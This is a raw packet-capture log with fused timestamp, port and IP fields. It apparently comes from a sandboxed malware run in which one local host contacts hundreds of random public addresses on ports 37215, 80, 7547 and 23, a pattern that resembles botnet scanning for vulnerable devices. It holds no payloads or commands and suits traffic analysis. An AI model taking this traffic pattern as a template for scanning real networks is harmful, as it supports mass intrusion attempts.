                                          Nov 7, 2024 11:57:59.430234909 CET3721530704156.224.207.12192.168.2.13
                                          Nov 7, 2024 11:57:59.430236101 CET3070437215192.168.2.13156.251.88.190
                                          Nov 7, 2024 11:57:59.430244923 CET3070437215192.168.2.13156.80.140.233
                                          Nov 7, 2024 11:57:59.430244923 CET3721530704156.147.136.42192.168.2.13
                                          Nov 7, 2024 11:57:59.430253983 CET3044880192.168.2.132.13.86.126
                                          Nov 7, 2024 11:57:59.430253983 CET3070437215192.168.2.13156.212.233.151
                                          Nov 7, 2024 11:57:59.430253983 CET3070437215192.168.2.13156.234.253.140
                                          Nov 7, 2024 11:57:59.430260897 CET3721530704156.103.122.4192.168.2.13
                                          Nov 7, 2024 11:57:59.430263042 CET3044880192.168.2.132.220.54.87
                                          Nov 7, 2024 11:57:59.430267096 CET3044880192.168.2.132.137.85.139
                                          Nov 7, 2024 11:57:59.430270910 CET3044880192.168.2.132.71.168.195
                                          Nov 7, 2024 11:57:59.430273056 CET3721530704156.3.64.200192.168.2.13
                                          Nov 7, 2024 11:57:59.430283070 CET3721530704156.21.222.213192.168.2.13
                                          Nov 7, 2024 11:57:59.430285931 CET3044880192.168.2.132.82.245.19
                                          Nov 7, 2024 11:57:59.430285931 CET3044880192.168.2.132.52.223.68
                                          Nov 7, 2024 11:57:59.430285931 CET3070437215192.168.2.13156.224.207.12
                                          Nov 7, 2024 11:57:59.430285931 CET3070437215192.168.2.13156.103.122.4
                                          Nov 7, 2024 11:57:59.430285931 CET3070437215192.168.2.13156.147.136.42
                                          Nov 7, 2024 11:57:59.430285931 CET3044880192.168.2.132.223.244.5
                                          Nov 7, 2024 11:57:59.430291891 CET3044880192.168.2.132.91.73.90
                                          Nov 7, 2024 11:57:59.430299997 CET3070437215192.168.2.13156.3.64.200
                                          Nov 7, 2024 11:57:59.430310011 CET3044880192.168.2.132.168.21.58
                                          Nov 7, 2024 11:57:59.430311918 CET3044880192.168.2.132.178.197.242
                                          Nov 7, 2024 11:57:59.430316925 CET3070437215192.168.2.13156.21.222.213
                                          Nov 7, 2024 11:57:59.430329084 CET3044880192.168.2.132.99.39.127
                                          Nov 7, 2024 11:57:59.430330038 CET3044880192.168.2.132.115.90.155
                                          Nov 7, 2024 11:57:59.430330038 CET3044880192.168.2.132.38.3.20
                                          Nov 7, 2024 11:57:59.430331945 CET3044880192.168.2.132.107.248.149
                                          Nov 7, 2024 11:57:59.430349112 CET3044880192.168.2.132.134.212.164
                                          Nov 7, 2024 11:57:59.430351019 CET3044880192.168.2.132.106.212.160
                                          Nov 7, 2024 11:57:59.430377960 CET3044880192.168.2.132.159.107.91
                                          Nov 7, 2024 11:57:59.430378914 CET3044880192.168.2.132.118.44.178
                                          Nov 7, 2024 11:57:59.430383921 CET3044880192.168.2.132.17.36.136
                                          Nov 7, 2024 11:57:59.430387020 CET3044880192.168.2.132.72.157.181
                                          Nov 7, 2024 11:57:59.430402994 CET3044880192.168.2.132.149.65.186
                                          Nov 7, 2024 11:57:59.430406094 CET3044880192.168.2.132.91.5.42
                                          Nov 7, 2024 11:57:59.430408001 CET3044880192.168.2.132.241.34.9
                                          Nov 7, 2024 11:57:59.430408001 CET3044880192.168.2.132.27.164.115
                                          Nov 7, 2024 11:57:59.430417061 CET3044880192.168.2.132.109.238.182
                                          Nov 7, 2024 11:57:59.430437088 CET3044880192.168.2.132.18.221.205
                                          Nov 7, 2024 11:57:59.430442095 CET3044880192.168.2.132.93.34.108
                                          Nov 7, 2024 11:57:59.430455923 CET3044880192.168.2.132.180.3.121
                                          Nov 7, 2024 11:57:59.430455923 CET3044880192.168.2.132.135.3.196
                                          Nov 7, 2024 11:57:59.430470943 CET3044880192.168.2.132.66.234.19
                                          Nov 7, 2024 11:57:59.430483103 CET3044880192.168.2.132.199.232.131
                                          Nov 7, 2024 11:57:59.430483103 CET3044880192.168.2.132.242.236.86
                                          Nov 7, 2024 11:57:59.430483103 CET3044880192.168.2.132.84.252.40
                                          Nov 7, 2024 11:57:59.430495024 CET3044880192.168.2.132.107.112.216
                                          Nov 7, 2024 11:57:59.430514097 CET3044880192.168.2.132.150.252.70
                                          Nov 7, 2024 11:57:59.430514097 CET3044880192.168.2.132.209.60.102
                                          Nov 7, 2024 11:57:59.430515051 CET3044880192.168.2.132.85.242.48
                                          Nov 7, 2024 11:57:59.430514097 CET3044880192.168.2.132.76.146.153
                                          Nov 7, 2024 11:57:59.430521011 CET3044880192.168.2.132.239.208.98
                                          Nov 7, 2024 11:57:59.430530071 CET3044880192.168.2.132.47.153.166
                                          Nov 7, 2024 11:57:59.430530071 CET3044880192.168.2.132.255.182.65
                                          Nov 7, 2024 11:57:59.430531025 CET3044880192.168.2.132.128.231.41
                                          Nov 7, 2024 11:57:59.430553913 CET3044880192.168.2.132.157.105.116
                                          Nov 7, 2024 11:57:59.430553913 CET3044880192.168.2.132.156.72.230
                                          Nov 7, 2024 11:57:59.430553913 CET3044880192.168.2.132.149.71.236
                                          Nov 7, 2024 11:57:59.430556059 CET3044880192.168.2.132.43.245.253
                                          Nov 7, 2024 11:57:59.430567026 CET3044880192.168.2.132.41.180.54
                                          Nov 7, 2024 11:57:59.430592060 CET3044880192.168.2.132.112.85.68
                                          Nov 7, 2024 11:57:59.430592060 CET3044880192.168.2.132.111.226.93
                                          Nov 7, 2024 11:57:59.430602074 CET3044880192.168.2.132.248.58.169
                                          Nov 7, 2024 11:57:59.430605888 CET3044880192.168.2.132.40.92.167
                                          Nov 7, 2024 11:57:59.430605888 CET3044880192.168.2.132.237.205.31
                                          Nov 7, 2024 11:57:59.430613041 CET3044880192.168.2.132.166.32.28
                                          Nov 7, 2024 11:57:59.430619001 CET3044880192.168.2.132.16.231.225
                                          Nov 7, 2024 11:57:59.430624008 CET3044880192.168.2.132.164.200.156
                                          Nov 7, 2024 11:57:59.430629015 CET3044880192.168.2.132.175.17.76
                                          Nov 7, 2024 11:57:59.430639029 CET3044880192.168.2.132.195.60.10
                                          Nov 7, 2024 11:57:59.430639029 CET3044880192.168.2.132.58.5.26
                                          Nov 7, 2024 11:57:59.430655003 CET3044880192.168.2.132.225.81.124
                                          Nov 7, 2024 11:57:59.430659056 CET3044880192.168.2.132.19.88.123
                                          Nov 7, 2024 11:57:59.430661917 CET3044880192.168.2.132.170.16.237
                                          Nov 7, 2024 11:57:59.430668116 CET3044880192.168.2.132.158.93.106
                                          Nov 7, 2024 11:57:59.430668116 CET3044880192.168.2.132.167.74.202
                                          Nov 7, 2024 11:57:59.430675983 CET3721530704156.16.12.93192.168.2.13
                                          Nov 7, 2024 11:57:59.430685997 CET3721530704156.240.130.167192.168.2.13
                                          Nov 7, 2024 11:57:59.430695057 CET3044880192.168.2.132.38.139.208
                                          Nov 7, 2024 11:57:59.430695057 CET3044880192.168.2.132.109.175.29
                                          Nov 7, 2024 11:57:59.430702925 CET3721530704156.128.215.63192.168.2.13
                                          Nov 7, 2024 11:57:59.430713892 CET3721530704156.113.96.179192.168.2.13
                                          Nov 7, 2024 11:57:59.430717945 CET3070437215192.168.2.13156.16.12.93
                                          Nov 7, 2024 11:57:59.430717945 CET3070437215192.168.2.13156.240.130.167
                                          Nov 7, 2024 11:57:59.430722952 CET3044880192.168.2.132.118.194.64
                                          Nov 7, 2024 11:57:59.430723906 CET3044880192.168.2.132.4.113.174
                                          Nov 7, 2024 11:57:59.430725098 CET3721530704156.79.84.205192.168.2.13
                                          Nov 7, 2024 11:57:59.430738926 CET3044880192.168.2.132.114.62.154
                                          Nov 7, 2024 11:57:59.430742025 CET3070437215192.168.2.13156.128.215.63
                                          Nov 7, 2024 11:57:59.430743933 CET3721530704156.255.149.204192.168.2.13
                                          Nov 7, 2024 11:57:59.430752993 CET3044880192.168.2.132.89.239.226
                                          Nov 7, 2024 11:57:59.430752993 CET3070437215192.168.2.13156.79.84.205
                                          Nov 7, 2024 11:57:59.430756092 CET3721530704156.123.18.233192.168.2.13
                                          Nov 7, 2024 11:57:59.430766106 CET3721530704156.161.8.188192.168.2.13
                                          Nov 7, 2024 11:57:59.430772066 CET3044880192.168.2.132.216.184.50
                                          Nov 7, 2024 11:57:59.430772066 CET3070437215192.168.2.13156.255.149.204
                                          Nov 7, 2024 11:57:59.430773973 CET3044880192.168.2.132.73.133.3
                                          Nov 7, 2024 11:57:59.430778027 CET3721530704156.177.66.29192.168.2.13
                                          Nov 7, 2024 11:57:59.430783987 CET3044880192.168.2.132.59.191.163
                                          Nov 7, 2024 11:57:59.430783987 CET3070437215192.168.2.13156.123.18.233
                                          Nov 7, 2024 11:57:59.430787086 CET3070437215192.168.2.13156.113.96.179
                                          Nov 7, 2024 11:57:59.430787086 CET3044880192.168.2.132.9.193.118
                                          Nov 7, 2024 11:57:59.430788994 CET3721530704156.219.195.28192.168.2.13
                                          Nov 7, 2024 11:57:59.430792093 CET3044880192.168.2.132.207.133.165
                                          Nov 7, 2024 11:57:59.430805922 CET3044880192.168.2.132.209.169.54
                                          Nov 7, 2024 11:57:59.430809021 CET3044880192.168.2.132.55.19.201
                                          Nov 7, 2024 11:57:59.430810928 CET3070437215192.168.2.13156.161.8.188
                                          Nov 7, 2024 11:57:59.430810928 CET3070437215192.168.2.13156.177.66.29
                                          Nov 7, 2024 11:57:59.430810928 CET3070437215192.168.2.13156.219.195.28
                                          Nov 7, 2024 11:57:59.430810928 CET3044880192.168.2.132.119.191.206
                                          Nov 7, 2024 11:57:59.430811882 CET3721530704156.249.140.142192.168.2.13
                                          Nov 7, 2024 11:57:59.430813074 CET3044880192.168.2.132.63.38.101
                                          Nov 7, 2024 11:57:59.430821896 CET3044880192.168.2.132.90.145.41
                                          Nov 7, 2024 11:57:59.430823088 CET3721530704156.41.242.248192.168.2.13
                                          Nov 7, 2024 11:57:59.430833101 CET3721530704156.212.113.179192.168.2.13
                                          Nov 7, 2024 11:57:59.430833101 CET3044880192.168.2.132.94.199.253
                                          Nov 7, 2024 11:57:59.430835009 CET3044880192.168.2.132.129.50.176
                                          Nov 7, 2024 11:57:59.430843115 CET3721530704156.10.123.124192.168.2.13
                                          Nov 7, 2024 11:57:59.430846930 CET3070437215192.168.2.13156.249.140.142
                                          Nov 7, 2024 11:57:59.430850029 CET3044880192.168.2.132.127.121.46
                                          Nov 7, 2024 11:57:59.430851936 CET3044880192.168.2.132.155.93.23
                                          Nov 7, 2024 11:57:59.430852890 CET3721530704156.225.105.175192.168.2.13
                                          Nov 7, 2024 11:57:59.430862904 CET3044880192.168.2.132.99.219.161
                                          Nov 7, 2024 11:57:59.430864096 CET3721530704156.230.68.127192.168.2.13
                                          Nov 7, 2024 11:57:59.430874109 CET3721530704156.108.180.250192.168.2.13
                                          Nov 7, 2024 11:57:59.430875063 CET3070437215192.168.2.13156.10.123.124
                                          Nov 7, 2024 11:57:59.430876017 CET3070437215192.168.2.13156.212.113.179
                                          Nov 7, 2024 11:57:59.430876017 CET3070437215192.168.2.13156.41.242.248
                                          Nov 7, 2024 11:57:59.430879116 CET3070437215192.168.2.13156.225.105.175
                                          Nov 7, 2024 11:57:59.430892944 CET3721530704156.89.229.9192.168.2.13
                                          Nov 7, 2024 11:57:59.430896044 CET3070437215192.168.2.13156.230.68.127
                                          Nov 7, 2024 11:57:59.430902004 CET3044880192.168.2.132.110.59.124
                                          Nov 7, 2024 11:57:59.430902958 CET3721530704156.98.192.53192.168.2.13
                                          Nov 7, 2024 11:57:59.430908918 CET3044880192.168.2.132.52.42.150
                                          Nov 7, 2024 11:57:59.430911064 CET3070437215192.168.2.13156.108.180.250
                                          Nov 7, 2024 11:57:59.430913925 CET3721530704156.196.3.252192.168.2.13
                                          Nov 7, 2024 11:57:59.430923939 CET3721530704156.137.118.160192.168.2.13
                                          Nov 7, 2024 11:57:59.430933952 CET3721530704156.240.157.179192.168.2.13
                                          Nov 7, 2024 11:57:59.430942059 CET3721530704156.88.149.235192.168.2.13
                                          Nov 7, 2024 11:57:59.430943966 CET3070437215192.168.2.13156.196.3.252
                                          Nov 7, 2024 11:57:59.430952072 CET3721530704156.59.141.72192.168.2.13
                                          Nov 7, 2024 11:57:59.430953026 CET3044880192.168.2.132.135.44.160
                                          Nov 7, 2024 11:57:59.430953979 CET3070437215192.168.2.13156.137.118.160
                                          Nov 7, 2024 11:57:59.430963993 CET3721530704156.80.171.209192.168.2.13
                                          Nov 7, 2024 11:57:59.430965900 CET3070437215192.168.2.13156.89.229.9
                                          Nov 7, 2024 11:57:59.430965900 CET3070437215192.168.2.13156.88.149.235
                                          Nov 7, 2024 11:57:59.430968046 CET3070437215192.168.2.13156.98.192.53
                                          Nov 7, 2024 11:57:59.430969000 CET3044880192.168.2.132.235.141.22
                                          Nov 7, 2024 11:57:59.430972099 CET3070437215192.168.2.13156.240.157.179
                                          Nov 7, 2024 11:57:59.430975914 CET3721530704156.230.160.180192.168.2.13
                                          Nov 7, 2024 11:57:59.430980921 CET3044880192.168.2.132.150.139.248
                                          Nov 7, 2024 11:57:59.430986881 CET3721530704156.42.254.178192.168.2.13
                                          Nov 7, 2024 11:57:59.430989027 CET3044880192.168.2.132.54.204.65
                                          Nov 7, 2024 11:57:59.430994987 CET3044880192.168.2.132.159.188.48
                                          Nov 7, 2024 11:57:59.430995941 CET3721530704156.136.244.168192.168.2.13
                                          Nov 7, 2024 11:57:59.431009054 CET3070437215192.168.2.13156.59.141.72
                                          Nov 7, 2024 11:57:59.431009054 CET3070437215192.168.2.13156.80.171.209
                                          Nov 7, 2024 11:57:59.431009054 CET3044880192.168.2.132.238.135.60
                                          Nov 7, 2024 11:57:59.431009054 CET3070437215192.168.2.13156.230.160.180
                                          Nov 7, 2024 11:57:59.431020975 CET3070437215192.168.2.13156.42.254.178
                                          Nov 7, 2024 11:57:59.431032896 CET3044880192.168.2.132.27.46.229
                                          Nov 7, 2024 11:57:59.431040049 CET3044880192.168.2.132.156.249.78
                                          Nov 7, 2024 11:57:59.431039095 CET3044880192.168.2.132.133.42.189
                                          Nov 7, 2024 11:57:59.431044102 CET3044880192.168.2.132.7.200.112
                                          Nov 7, 2024 11:57:59.431045055 CET3070437215192.168.2.13156.136.244.168
                                          Nov 7, 2024 11:57:59.431065083 CET3044880192.168.2.132.57.134.0
                                          Nov 7, 2024 11:57:59.431090117 CET3044880192.168.2.132.139.29.230
                                          Nov 7, 2024 11:57:59.431093931 CET3044880192.168.2.132.207.61.129
                                          Nov 7, 2024 11:57:59.431093931 CET3044880192.168.2.132.189.233.55
                                          Nov 7, 2024 11:57:59.431093931 CET3044880192.168.2.132.96.124.251
                                          Nov 7, 2024 11:57:59.431096077 CET3044880192.168.2.132.120.217.116
                                          Nov 7, 2024 11:57:59.431113005 CET3044880192.168.2.132.87.23.9
                                          Nov 7, 2024 11:57:59.431113005 CET3044880192.168.2.132.239.155.1
                                          Nov 7, 2024 11:57:59.431114912 CET3044880192.168.2.132.141.170.66
                                          Nov 7, 2024 11:57:59.431128025 CET3044880192.168.2.132.218.12.72
                                          Nov 7, 2024 11:57:59.431133032 CET3044880192.168.2.132.30.80.245
                                          Nov 7, 2024 11:57:59.431163073 CET3044880192.168.2.132.143.42.203
                                          Nov 7, 2024 11:57:59.431168079 CET426687547192.168.2.13207.86.105.37
                                          Nov 7, 2024 11:57:59.431190968 CET3044880192.168.2.132.170.139.52
                                          Nov 7, 2024 11:57:59.431190968 CET3044880192.168.2.132.187.112.221
                                          Nov 7, 2024 11:57:59.431191921 CET3044880192.168.2.132.121.10.232
                                          Nov 7, 2024 11:57:59.431191921 CET3044880192.168.2.132.173.44.246
                                          Nov 7, 2024 11:57:59.431193113 CET3044880192.168.2.132.81.85.73
                                          Nov 7, 2024 11:57:59.431216955 CET3044880192.168.2.132.16.216.75
                                          Nov 7, 2024 11:57:59.431224108 CET3044880192.168.2.132.172.211.91
                                          Nov 7, 2024 11:57:59.431230068 CET3044880192.168.2.132.103.105.174
                                          Nov 7, 2024 11:57:59.431236029 CET3044880192.168.2.132.59.245.129
                                          Nov 7, 2024 11:57:59.431236982 CET3044880192.168.2.132.216.8.246
                                          Nov 7, 2024 11:57:59.431241035 CET3044880192.168.2.132.150.192.222
                                          Nov 7, 2024 11:57:59.431246042 CET3044880192.168.2.132.16.214.148
                                          Nov 7, 2024 11:57:59.431257963 CET3044880192.168.2.132.75.148.134
                                          Nov 7, 2024 11:57:59.431257963 CET3044880192.168.2.132.231.126.246
                                          Nov 7, 2024 11:57:59.431265116 CET3044880192.168.2.132.94.241.112
                                          Nov 7, 2024 11:57:59.431277990 CET3044880192.168.2.132.15.23.197
                                          Nov 7, 2024 11:57:59.431281090 CET3044880192.168.2.132.56.129.163
                                          Nov 7, 2024 11:57:59.431282997 CET3044880192.168.2.132.26.69.168
                                          Nov 7, 2024 11:57:59.431284904 CET3044880192.168.2.132.109.49.159
                                          Nov 7, 2024 11:57:59.431287050 CET3044880192.168.2.132.79.103.68
                                          Nov 7, 2024 11:57:59.431303978 CET3044880192.168.2.132.89.200.33
                                          Nov 7, 2024 11:57:59.431303978 CET3044880192.168.2.132.247.149.245
                                          Nov 7, 2024 11:57:59.431308031 CET3044880192.168.2.132.146.117.234
                                          Nov 7, 2024 11:57:59.431323051 CET3044880192.168.2.132.168.86.133
                                          Nov 7, 2024 11:57:59.431333065 CET3044880192.168.2.132.46.81.177
                                          Nov 7, 2024 11:57:59.431338072 CET3044880192.168.2.132.159.205.89
                                          Nov 7, 2024 11:57:59.431339025 CET3044880192.168.2.132.222.144.194
                                          Nov 7, 2024 11:57:59.431349993 CET3044880192.168.2.132.64.218.72
                                          Nov 7, 2024 11:57:59.431349993 CET3044880192.168.2.132.15.244.6
                                          Nov 7, 2024 11:57:59.431359053 CET3044880192.168.2.132.166.84.243
                                          Nov 7, 2024 11:57:59.431375027 CET4531023192.168.2.13171.119.113.145
                                          Nov 7, 2024 11:57:59.431384087 CET3044880192.168.2.132.119.3.195
                                          Nov 7, 2024 11:57:59.431386948 CET3044880192.168.2.132.133.195.181
                                          Nov 7, 2024 11:57:59.431389093 CET3044880192.168.2.132.58.230.117
                                          Nov 7, 2024 11:57:59.431399107 CET3044880192.168.2.132.164.7.102
                                          Nov 7, 2024 11:57:59.431405067 CET3721530704156.168.9.54192.168.2.13
                                          Nov 7, 2024 11:57:59.431406021 CET3044880192.168.2.132.167.73.70
                                          Nov 7, 2024 11:57:59.431413889 CET3044880192.168.2.132.123.190.75
                                          Nov 7, 2024 11:57:59.431416988 CET3721530704156.51.123.6192.168.2.13
                                          Nov 7, 2024 11:57:59.431420088 CET3044880192.168.2.132.146.61.231
                                          Nov 7, 2024 11:57:59.431420088 CET3044880192.168.2.132.44.44.145
                                          Nov 7, 2024 11:57:59.431426048 CET3721530704156.252.115.20192.168.2.13
                                          Nov 7, 2024 11:57:59.431435108 CET3044880192.168.2.132.106.135.98
                                          Nov 7, 2024 11:57:59.431435108 CET3044880192.168.2.132.97.220.150
                                          Nov 7, 2024 11:57:59.431435108 CET3044880192.168.2.132.221.21.173
                                          Nov 7, 2024 11:57:59.431437016 CET3721530704156.95.221.249192.168.2.13
                                          Nov 7, 2024 11:57:59.431441069 CET3044880192.168.2.132.68.244.221
                                          Nov 7, 2024 11:57:59.431442022 CET3070437215192.168.2.13156.168.9.54
                                          Nov 7, 2024 11:57:59.431447029 CET3721530704156.172.84.60192.168.2.13
                                          Nov 7, 2024 11:57:59.431453943 CET3070437215192.168.2.13156.252.115.20
                                          Nov 7, 2024 11:57:59.431457996 CET3070437215192.168.2.13156.51.123.6
                                          Nov 7, 2024 11:57:59.431466103 CET3721530704156.178.182.41192.168.2.13
                                          Nov 7, 2024 11:57:59.431476116 CET3721530704156.130.46.74192.168.2.13
                                          Nov 7, 2024 11:57:59.431483984 CET3070437215192.168.2.13156.95.221.249
                                          Nov 7, 2024 11:57:59.431483984 CET3044880192.168.2.132.133.230.43
                                          Nov 7, 2024 11:57:59.431485891 CET3721530704156.81.16.229192.168.2.13
                                          Nov 7, 2024 11:57:59.431487083 CET3044880192.168.2.132.61.223.84
                                          Nov 7, 2024 11:57:59.431497097 CET3070437215192.168.2.13156.172.84.60
                                          Nov 7, 2024 11:57:59.431498051 CET3721530704156.171.94.42192.168.2.13
                                          Nov 7, 2024 11:57:59.431499958 CET3044880192.168.2.132.78.50.254
                                          Nov 7, 2024 11:57:59.431499958 CET3070437215192.168.2.13156.178.182.41
                                          Nov 7, 2024 11:57:59.431504965 CET3044880192.168.2.132.142.193.76
                                          Nov 7, 2024 11:57:59.431508064 CET3721530704156.99.123.75192.168.2.13
                                          Nov 7, 2024 11:57:59.431509018 CET3070437215192.168.2.13156.130.46.74
                                          Nov 7, 2024 11:57:59.431510925 CET3070437215192.168.2.13156.81.16.229
                                          Nov 7, 2024 11:57:59.431520939 CET3044880192.168.2.132.67.233.116
                                          Nov 7, 2024 11:57:59.431533098 CET3721530704156.124.81.248192.168.2.13
                                          Nov 7, 2024 11:57:59.431538105 CET3070437215192.168.2.13156.171.94.42
                                          Nov 7, 2024 11:57:59.431538105 CET3044880192.168.2.132.230.226.249
                                          Nov 7, 2024 11:57:59.431540966 CET3044880192.168.2.132.119.77.134
                                          Nov 7, 2024 11:57:59.431540966 CET3044880192.168.2.132.140.240.76
                                          Nov 7, 2024 11:57:59.431544065 CET3721530704156.104.48.97192.168.2.13
                                          Nov 7, 2024 11:57:59.431551933 CET3070437215192.168.2.13156.99.123.75
                                          Nov 7, 2024 11:57:59.431552887 CET3721530704156.47.99.206192.168.2.13
                                          Nov 7, 2024 11:57:59.431561947 CET3044880192.168.2.132.78.150.0
                                          Nov 7, 2024 11:57:59.431564093 CET3044880192.168.2.132.186.160.2
                                          Nov 7, 2024 11:57:59.431564093 CET3044880192.168.2.132.58.209.19
                                          Nov 7, 2024 11:57:59.431566954 CET3721530704156.255.154.188192.168.2.13
                                          Nov 7, 2024 11:57:59.431569099 CET3044880192.168.2.132.228.47.47
                                          Nov 7, 2024 11:57:59.431569099 CET3070437215192.168.2.13156.124.81.248
                                          Nov 7, 2024 11:57:59.431572914 CET3044880192.168.2.132.47.13.33
                                          Nov 7, 2024 11:57:59.431572914 CET3070437215192.168.2.13156.104.48.97
                                          Nov 7, 2024 11:57:59.431577921 CET3721530704156.231.188.154192.168.2.13
                                          Nov 7, 2024 11:57:59.431586981 CET3070437215192.168.2.13156.47.99.206
                                          Nov 7, 2024 11:57:59.431587934 CET3721530704156.244.255.231192.168.2.13
                                          Nov 7, 2024 11:57:59.431591988 CET3044880192.168.2.132.175.2.146
                                          Nov 7, 2024 11:57:59.431605101 CET3070437215192.168.2.13156.255.154.188
                                          Nov 7, 2024 11:57:59.431606054 CET3721530704156.205.41.100192.168.2.13
                                          Nov 7, 2024 11:57:59.431617022 CET3721530704156.4.228.99192.168.2.13
                                          Nov 7, 2024 11:57:59.431618929 CET3070437215192.168.2.13156.244.255.231
                                          Nov 7, 2024 11:57:59.431622982 CET3044880192.168.2.132.79.156.37
                                          Nov 7, 2024 11:57:59.431624889 CET3070437215192.168.2.13156.231.188.154
                                          Nov 7, 2024 11:57:59.431627035 CET3721530704156.120.45.205192.168.2.13
                                          Nov 7, 2024 11:57:59.431631088 CET3070437215192.168.2.13156.205.41.100
                                          Nov 7, 2024 11:57:59.431631088 CET3044880192.168.2.132.115.118.218
                                          Nov 7, 2024 11:57:59.431652069 CET3044880192.168.2.132.73.21.64
                                          Nov 7, 2024 11:57:59.431652069 CET3070437215192.168.2.13156.4.228.99
                                          Nov 7, 2024 11:57:59.431658983 CET3044880192.168.2.132.134.8.156
                                          Nov 7, 2024 11:57:59.431658983 CET3044880192.168.2.132.122.118.72
                                          Nov 7, 2024 11:57:59.431658983 CET3044880192.168.2.132.218.71.34
                                          Nov 7, 2024 11:57:59.431674957 CET3070437215192.168.2.13156.120.45.205
                                          Nov 7, 2024 11:57:59.431677103 CET3044880192.168.2.132.79.223.75
                                          Nov 7, 2024 11:57:59.431678057 CET3044880192.168.2.132.163.44.189
                                          Nov 7, 2024 11:57:59.431691885 CET3044880192.168.2.132.54.247.189
                                          Nov 7, 2024 11:57:59.431704044 CET3044880192.168.2.132.97.235.253
                                          Nov 7, 2024 11:57:59.431704044 CET3044880192.168.2.132.50.66.73
                                          Nov 7, 2024 11:57:59.431705952 CET3044880192.168.2.132.111.117.220
                                          Nov 7, 2024 11:57:59.431709051 CET3721530704156.173.235.246192.168.2.13
                                          Nov 7, 2024 11:57:59.431720018 CET3721530704156.233.119.140192.168.2.13
                                          Nov 7, 2024 11:57:59.431725025 CET3044880192.168.2.132.81.46.103
                                          Nov 7, 2024 11:57:59.431725025 CET3044880192.168.2.132.108.64.103
                                          Nov 7, 2024 11:57:59.431725979 CET3044880192.168.2.132.13.157.242
                                          Nov 7, 2024 11:57:59.431725979 CET3044880192.168.2.132.40.238.122
                                          Nov 7, 2024 11:57:59.431730032 CET3721530704156.232.8.7192.168.2.13
                                          Nov 7, 2024 11:57:59.431740999 CET3721530704156.36.41.236192.168.2.13
                                          Nov 7, 2024 11:57:59.431749105 CET3070437215192.168.2.13156.173.235.246
                                          Nov 7, 2024 11:57:59.431750059 CET3070437215192.168.2.13156.233.119.140
                                          Nov 7, 2024 11:57:59.431750059 CET3044880192.168.2.132.235.95.212
                                          Nov 7, 2024 11:57:59.431751013 CET3721530704156.29.179.149192.168.2.13
                                          Nov 7, 2024 11:57:59.431761980 CET3721530704156.35.126.104192.168.2.13
                                          Nov 7, 2024 11:57:59.431766033 CET3044880192.168.2.132.49.117.181
                                          Nov 7, 2024 11:57:59.431767941 CET3070437215192.168.2.13156.232.8.7
                                          Nov 7, 2024 11:57:59.431771994 CET3721530704156.70.201.60192.168.2.13
                                          Nov 7, 2024 11:57:59.431777000 CET3070437215192.168.2.13156.29.179.149
                                          Nov 7, 2024 11:57:59.431782007 CET3721530704156.13.199.70192.168.2.13
                                          Nov 7, 2024 11:57:59.431786060 CET3044880192.168.2.132.178.100.200
                                          Nov 7, 2024 11:57:59.431791067 CET3044880192.168.2.132.184.233.201
                                          Nov 7, 2024 11:57:59.431791067 CET3070437215192.168.2.13156.36.41.236
                                          Nov 7, 2024 11:57:59.431792021 CET3721530704156.52.151.20192.168.2.13
                                          Nov 7, 2024 11:57:59.431803942 CET3044880192.168.2.132.225.205.128
                                          Nov 7, 2024 11:57:59.431803942 CET3044880192.168.2.132.225.74.131
                                          Nov 7, 2024 11:57:59.431803942 CET3070437215192.168.2.13156.35.126.104
                                          Nov 7, 2024 11:57:59.431804895 CET3070437215192.168.2.13156.70.201.60
                                          Nov 7, 2024 11:57:59.431804895 CET3070437215192.168.2.13156.13.199.70
                                          Nov 7, 2024 11:57:59.431813002 CET3044880192.168.2.132.149.108.131
                                          Nov 7, 2024 11:57:59.431827068 CET3044880192.168.2.132.7.227.104
                                          Nov 7, 2024 11:57:59.431827068 CET3044880192.168.2.132.45.252.247
                                          Nov 7, 2024 11:57:59.431832075 CET3070437215192.168.2.13156.52.151.20
                                          Nov 7, 2024 11:57:59.431833982 CET3044880192.168.2.132.208.232.144
                                          Nov 7, 2024 11:57:59.431839943 CET3044880192.168.2.132.99.42.95
                                          Nov 7, 2024 11:57:59.431854010 CET3044880192.168.2.132.81.239.79
                                          Nov 7, 2024 11:57:59.431874037 CET3044880192.168.2.132.1.174.111
                                          Nov 7, 2024 11:57:59.431875944 CET3044880192.168.2.132.139.108.94
                                          Nov 7, 2024 11:57:59.431876898 CET3044880192.168.2.132.132.235.7
                                          Nov 7, 2024 11:57:59.431876898 CET3044880192.168.2.132.162.115.243
                                          Nov 7, 2024 11:57:59.431879997 CET3044880192.168.2.132.160.4.148
                                          Nov 7, 2024 11:57:59.431885004 CET3044880192.168.2.132.79.243.156
                                          Nov 7, 2024 11:57:59.431885004 CET3044880192.168.2.132.199.125.184
                                          Nov 7, 2024 11:57:59.431893110 CET3044880192.168.2.132.192.207.65
                                          Nov 7, 2024 11:57:59.431900978 CET3044880192.168.2.132.183.89.81
                                          Nov 7, 2024 11:57:59.431902885 CET3044880192.168.2.132.189.217.37
                                          Nov 7, 2024 11:57:59.431924105 CET3044880192.168.2.132.232.122.69
                                          Nov 7, 2024 11:57:59.431931973 CET3044880192.168.2.132.150.137.150
                                          Nov 7, 2024 11:57:59.431932926 CET3044880192.168.2.132.186.4.36
                                          Nov 7, 2024 11:57:59.431931973 CET3044880192.168.2.132.65.145.233
                                          Nov 7, 2024 11:57:59.431935072 CET3044880192.168.2.132.79.113.35
                                          Nov 7, 2024 11:57:59.431941986 CET3044880192.168.2.132.55.232.64
                                          Nov 7, 2024 11:57:59.431941986 CET3044880192.168.2.132.210.138.185
                                          Nov 7, 2024 11:57:59.431946039 CET3044880192.168.2.132.26.20.113
                                          Nov 7, 2024 11:57:59.431946993 CET3044880192.168.2.132.146.146.224
                                          Nov 7, 2024 11:57:59.431957960 CET3044880192.168.2.132.89.193.210
                                          Nov 7, 2024 11:57:59.431962967 CET3044880192.168.2.132.172.254.60
                                          Nov 7, 2024 11:57:59.431966066 CET3044880192.168.2.132.67.143.189
                                          Nov 7, 2024 11:57:59.431982040 CET3044880192.168.2.132.120.174.252
                                          Nov 7, 2024 11:57:59.431988955 CET3044880192.168.2.132.150.138.168
                                          Nov 7, 2024 11:57:59.431998014 CET3044880192.168.2.132.203.1.49
                                          Nov 7, 2024 11:57:59.432003021 CET3044880192.168.2.132.192.141.202
                                          Nov 7, 2024 11:57:59.432003021 CET3044880192.168.2.132.73.209.145
                                          Nov 7, 2024 11:57:59.432025909 CET3044880192.168.2.132.236.182.5
                                          Nov 7, 2024 11:57:59.432030916 CET3044880192.168.2.132.134.251.48
                                          Nov 7, 2024 11:57:59.432034969 CET3044880192.168.2.132.8.7.239
                                          Nov 7, 2024 11:57:59.432034969 CET3044880192.168.2.132.100.2.54
